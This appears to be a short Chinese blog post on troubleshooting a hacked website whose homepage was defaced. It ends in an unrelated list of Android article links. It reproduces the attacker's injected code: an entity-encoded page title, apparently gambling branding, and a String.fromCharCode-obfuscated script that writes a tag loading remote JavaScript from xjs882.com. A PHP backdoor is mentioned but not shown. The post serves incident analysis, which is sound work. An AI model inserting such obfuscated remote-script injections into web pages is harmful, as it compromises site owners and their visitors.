黑客攻击网站,篡改首页问题排查修复

1,修改首页,并植入js

标题通过unicode编码,隐藏了

<title>&#24320;&#20113;&#40;&#20013;&#22269;&#41;&#75;&#97;&#105;&#121;&#117;&#110;&#183;&#23448;

js文件通过String.fromCharCode隐藏起来了

<script type="text/javascript"> var xt = String.fromCharCode(0,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,120,106,115,56,56,50,46,99,111,109,47,121,98,46,106,115,34,62,60, 47,115, 99,114,105,112,116,62); document.write(xt);

2,加入php后门

解码后在实际攻击内容如下

相关推荐
AmazingMQ14 分钟前
Android 13----在framworks层映射一个物理按键
android
小李飞飞砖25 分钟前
Android 插件化实现原理详解
android
m0_5973453134 分钟前
【Android】安卓四大组件之广播接收器(Broadcast Receiver):从基础到进阶
android·java·boradcast·安卓四大组件
whysqwhw1 小时前
OkHttp PublicSuffix包的后缀列表处理
android
yeziyfx1 小时前
kotlin中集合的用法
android·开发语言·kotlin
EngZegNgi3 小时前
安卓应用启动崩溃的问题排查记录
android·crash·启动崩溃
火柴就是我4 小时前
每日见闻之Container Decoration
android·flutter
天枢破军4 小时前
【AOSP】解决repo拉取提示无法连接android.googlesource.com
android
whysqwhw4 小时前
OkHttp之AndroidPlatform类分析
android
XiaolongTu4 小时前
Kotlin Flow详述:从一个“卡顿”问题到线程切换的本质
android·面试